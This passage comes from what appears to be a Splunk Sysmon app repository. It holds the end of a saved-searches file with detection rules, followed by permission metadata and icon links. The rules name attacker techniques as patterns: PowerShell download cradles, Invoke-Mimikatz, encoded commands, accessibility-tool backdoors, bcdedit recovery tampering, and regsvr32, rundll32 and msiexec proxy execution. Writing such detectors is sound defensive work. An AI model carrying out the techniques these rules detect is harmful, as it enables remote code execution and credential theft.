*DownloadString* OR *DownloadFile* OR *DownloadData* OR *ShellExecute* OR *Invoke-Mimikatz* OR *schtasks*create* OR *Webclient* OR *FromBase64String* OR *IO.StreamReader* OR *IO.MemoryStream* OR *IO.Compression.DeflateStream* ) NOT ( C:\\windows\\ccm\\)\ 1071 | | table _time, host, process, CommandLine, ParentProcessId, ParentImage, ParentCommandLine, User 1072 | 1073 | [T1086 - Powershell Suspicious Strings] 1074 | action.email.useNSSubject = 1 1075 | action.securityanalytics_ar.param.verbose = 0 1076 | alert.suppress = 0 1077 | alert.track = 0 1078 | cron_schedule = */20 * * * * 1079 | dispatch.earliest_time = -20m 1080 | display.general.type = statistics 1081 | display.page.search.mode = verbose 1082 | display.page.search.tab = statistics 1083 | display.visualizations.charting.chart = pie 1084 | display.visualizations.show = 0 1085 | display.visualizations.type = mapping 1086 | quantity = 0 1087 | relation = greater than 1088 | request.ui_dispatch_app = sysmon-splunk-app 1089 | request.ui_dispatch_view = search 1090 | search = `sysmon` EventCode=1 process=powershell.exe (*-W*Hidden* OR *-nologo* OR *-nop* OR *IEX* OR *Out-MiniDump* OR *-enc* OR *-EncodedCommand* OR *DownloadString* OR *DownloadFile* OR *DownloadData* OR *ShellExecute* OR *Invoke-Mimikatz* OR *schtasks*create* OR *Webclient* OR *FromBase64String* OR *IO.StreamReader* OR *IO.MemoryStream* OR *IO.Compression.DeflateStream* ) NOT ( C:\\windows\\ccm\\)\ 1091 | | table _time, host, process, CommandLine, ParentProcessId, ParentImage, ParentCommandLine, User 1092 | 1093 | [T1015_Accessibility_Backdoor] 1094 | action.email.useNSSubject = 1 1095 | action.securityanalytics_ar.param.verbose = 0 1096 | alert.track = 0 1097 | description = T1015_Accessibility_Backdoor 1098 | dispatch.earliest_time = -24h@h 1099 | dispatch.latest_time = now 1100 | dispatchAs = user 1101 | display.general.type = statistics 1102 | display.page.search.tab = statistics 1103 | display.visualizations.charting.chart = bar 1104 | display.visualizations.show = 0 1105 | request.ui_dispatch_app = sysmon-splunk-app 1106 | request.ui_dispatch_view = search 1107 | search = `sysmon` EventCode=1 (\ 1108 | (ParentImage=*\\winlogon.exe \ 1109 | ((process=Utilman.exe CommandLine=*/debug*) OR (process=sethc.exe (CommandLine=*sethc.exe 211* OR CommandLine=*sethc.exe 101*)))) \ 1110 | OR\ 1111 | (ParentImage=*\\utilman.exe (CommandLine=*osk.exe* OR CommandLine=*magnify.exe* OR CommandLine=*narrator.exe* OR CommandLine=*DisplaySwitch.exe* OR CommandLine=*AtBroker.exe*))\ 1112 | )\ 1113 | | table _time, host, process, CommandLine, ParentProcessId, ParentImage, ParentCommandLine, User 1114 | 1115 | [IOC - Disable Startup Repair] 1116 | action.email.useNSSubject = 1 1117 | action.securityanalytics_ar.param.verbose = 0 1118 | alert.suppress = 0 1119 | alert.track = 1 1120 | counttype = number of events 1121 | cron_schedule = */20 * * * * 1122 | dispatch.earliest_time = -20m 1123 | display.visualizations.charting.chart = bubble 1124 | display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz 1125 | display.visualizations.type = custom 1126 | enableSched = 1 1127 | quantity = 0 1128 | relation = greater than 1129 | request.ui_dispatch_app = sysmon-splunk-app 1130 | request.ui_dispatch_view = search 1131 | search = `sysmon` process=BCDEDIT.EXE (CommandLine=*/set*recoveryenable*no* OR CommandLine=*/set*bootstatuspolicy*ignoreallfailures*) 1132 | 1133 | [Runs From RECYCLEBIN] 1134 | action.email.useNSSubject = 1 1135 | action.securityanalytics_ar.param.verbose = 0 1136 | alert.track = 0 1137 | dispatch.earliest_time = -7d@h 1138 | dispatch.latest_time = now 1139 | dispatchAs = user 1140 | display.general.type = statistics 1141 | display.page.search.tab = statistics 1142 | display.visualizations.charting.chart = bubble 1143 | display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz 1144 | display.visualizations.show = 0 1145 | display.visualizations.type = custom 1146 | request.ui_dispatch_app = sysmon-splunk-app 1147 | request.ui_dispatch_view = search 1148 | search = `sysmon` EventCode=1 $RECYCLE.BIN OR \\RECYCLER\\ | stats values(host) as host values(CommandLine) values(user) count by ParentImage process 1149 | 1150 | [Runs from SYSVOL] 1151 | action.email.useNSSubject = 1 1152 | action.securityanalytics_ar.param.verbose = 0 1153 | alert.track = 0 1154 | dispatch.earliest_time = -24h@h 1155 | dispatch.latest_time = now 1156 | display.general.type = statistics 1157 | display.page.search.tab = statistics 1158 | display.visualizations.charting.chart = bubble 1159 | display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz 1160 | display.visualizations.show = 0 1161 | display.visualizations.type = custom 1162 | request.ui_dispatch_app = sysmon-splunk-app 1163 | request.ui_dispatch_view = search 1164 | search = `sysmon` EventCode=1 :\\System Volume Information\\ | stats values(host) as host values(CommandLine) values(user) count by ParentImage Image 1165 | 1166 | [T1117 - REGSVR Proxy Execution] 1167 | action.email.useNSSubject = 1 1168 | action.securityanalytics_ar.param.verbose = 0 1169 | alert.severity = 4 1170 | alert.suppress = 0 1171 | alert.track = 1 1172 | counttype = number of events 1173 | cron_schedule = */20 * * * * 1174 | dispatch.earliest_time = -20m 1175 | display.general.type = statistics 1176 | display.page.search.tab = statistics 1177 | display.visualizations.charting.chart = bubble 1178 | display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz 1179 | display.visualizations.type = custom 1180 | enableSched = 1 1181 | quantity = 0 1182 | relation = greater than 1183 | request.ui_dispatch_app = sysmon-splunk-app 1184 | request.ui_dispatch_view = search 1185 | search = `sysmon` EventCode=1 process=REGSVR32.EXE CommandLine=*/i:*http://* | table _time host Image CommandLine ParentImage ParentCommandLine host user 1186 | 1187 | [rundll32.exe - All Executions] 1188 | action.email.useNSSubject = 1 1189 | action.securityanalytics_ar.param.verbose = 0 1190 | alert.track = 0 1191 | description = T1085 1192 | dispatch.earliest_time = -24h@h 1193 | dispatch.latest_time = now 1194 | display.general.type = statistics 1195 | display.page.search.tab = statistics 1196 | display.visualizations.charting.chart = bubble 1197 | display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz 1198 | display.visualizations.show = 0 1199 | display.visualizations.type = custom 1200 | request.ui_dispatch_app = sysmon-splunk-app 1201 | request.ui_dispatch_view = search 1202 | search = `sysmon` process=rundll32.exe | stats values(ParentImage) values(process) count by CommandLine 1203 | 1204 | [T1085 - rundll32 with javascript arg] 1205 | action.email.useNSSubject = 1 1206 | action.securityanalytics_ar.param.verbose = 0 1207 | alert.suppress = 0 1208 | alert.track = 1 1209 | counttype = number of events 1210 | cron_schedule = */20 * * * * 1211 | dispatch.earliest_time = -20m 1212 | display.general.type = statistics 1213 | display.page.search.tab = statistics 1214 | display.visualizations.charting.chart = bubble 1215 | display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz 1216 | display.visualizations.type = custom 1217 | enableSched = 1 1218 | quantity = 0 1219 | relation = greater than 1220 | request.ui_dispatch_app = sysmon-splunk-app 1221 | request.ui_dispatch_view = search 1222 | search = `sysmon` EventCode=1 process=rundll32.exe CommandLine=*javascript:* | table _time host process ParentImage CommandLine ParentCommandLine 1223 | 1224 | [IOC - Suspicious msiexec execution] 1225 | action.email.useNSSubject = 1 1226 | action.securityanalytics_ar.param.verbose = 0 1227 | alert.suppress = 0 1228 | alert.track = 1 1229 | counttype = number of events 1230 | cron_schedule = */20 * * * * 1231 | dispatch.earliest_time = -20m 1232 | display.page.search.mode = verbose 1233 | display.visualizations.charting.chart = bar 1234 | display.visualizations.custom.type = Splunk_ML_Toolkit.ScatterLineViz 1235 | display.visualizations.type = singlevalue 1236 | enableSched = 1 1237 | quantity = 0 1238 | relation = greater than 1239 | request.ui_dispatch_app = sysmon-splunk-app 1240 | request.ui_dispatch_view = search 1241 | search = `sysmon` process=msiexec.exe CommandLine=*/i*http* 1242 | -------------------------------------------------------------------------------- /metadata/default.meta: -------------------------------------------------------------------------------- 1 | 2 | # Application-level permissions 3 | 4 | [] 5 | access = read : [ * ], write : [ admin, power ] 6 | 7 | ### EVENT TYPES 8 | 9 | [eventtypes] 10 | export = system 11 | 12 | 13 | ### PROPS 14 | 15 | [props] 16 | export = system 17 | 18 | 19 | ### TRANSFORMS 20 | 21 | [transforms] 22 | export = system 23 | 24 | 25 | ### LOOKUPS 26 | 27 | [lookups] 28 | export = system 29 | 30 | 31 | ### VIEWSTATES: even normal users should be able to create shared viewstates 32 | 33 | [viewstates] 34 | access = read : [ * ], write : [ * ] 35 | export = system 36 | -------------------------------------------------------------------------------- /static/appIcon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MHaggis/sysmon-splunk-app/5c6e54e869f2b536c482c3534a16835725b44386/static/appIcon.png -------------------------------------------------------------------------------- /static/appIconAlt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MHaggis/sysmon-splunk-app/5c6e54e869f2b536c482c3534a16835725b44386/static/appIconAlt.png -------------------------------------------------------------------------------- /static/appIconAlt_2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MHaggis/sysmon-splunk-app/5c6e54e869f2b536c482c3534a16835725b44386/static/appIconAlt_2x.png -------------------------------------------------------------------------------- /static/appIcon_2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MHaggis/sysmon-splunk-app/5c6e54e869f2b536c482c3534a16835725b44386/static/appIcon_2x.png --------------------------------------------------------------------------------